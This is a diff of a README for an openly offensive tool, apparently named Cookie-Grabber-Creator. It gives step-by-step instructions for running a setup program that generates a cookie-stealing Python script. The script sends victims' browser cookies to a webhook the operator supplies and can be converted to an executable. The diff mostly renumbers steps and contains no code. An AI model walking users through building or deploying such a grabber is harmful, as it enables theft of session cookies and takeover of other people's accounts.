H4cking-Esentials/Cookie-Grabber-Creator/README.md

 1. Run setup.exe
 2. Put in the name of your grabber.
 3. Put in the webhook from the channel you want to receive cookies from.
+4. When it is complete check the same directory as the setup for a grabber python script that you can convert to exe.

-4. **If setup.exe takes longer than 30 seconds, go to GrabberSetup --> help --> BackupSetup (LAST RESORT) and run that**
+5. **If setup.exe takes longer than 30 seconds, go to GrabberSetup --> help --> BackupSetup (LAST RESORT) and run that**
+6. Run steps 2-4 again.
-5. That is the simplified version and it should load quicker but you won't get as many features.
+7. That is the simplified version and it should load quicker but you won't get as many features.

-When it is complete check the same directory as the setup for a grabber python script that you can convert to exe.

 # Features